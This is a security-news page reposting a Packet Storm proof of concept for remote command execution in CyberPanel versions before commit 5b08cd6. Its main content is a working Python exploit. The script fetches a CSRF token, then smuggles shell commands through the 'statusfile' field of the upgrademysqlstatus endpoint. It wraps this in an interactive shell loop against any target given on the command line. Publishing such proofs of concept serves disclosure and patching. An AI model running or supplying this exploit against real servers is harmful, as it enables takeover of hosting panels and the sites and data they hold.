Security
Headlines
HeadlinesLatestCVEs

Headline

CyberPanel upgrademysqlstatus Arbitrary Command Execution

Proof of concept remote command execution exploit for CyberPanel versions prior to 5b08cd6.

Packet Storm
#sql#csrf#js
import httpx import sys def get_CSRF_token(client):    resp = client.get("/")        return resp.cookies['csrftoken']    def pwn(client, CSRF_token, cmd):    headers = {        "X-CSRFToken": CSRF_token,        "Content-Type":"application/json",        "Referer": str(client.base_url)    }        payload = '{"statusfile":"/dev/null; %s; #","csrftoken":"%s"}' % (cmd, CSRF_token)        return client.put("/dataBases/upgrademysqlstatus", headers=headers, data=payload).json()["requestStatus"]    def exploit(client, cmd):    CSRF_token = get_CSRF_token(client)    stdout = pwn(client, CSRF_token, cmd)    print(stdout)    if __name__ == "__main__":    target = sys.argv[1]        client = httpx.Client(base_url=target, verify=False)    while True:        cmd = input("$> ")        exploit(client, cmd)

Packet Storm: Latest News

Zeek 6.0.9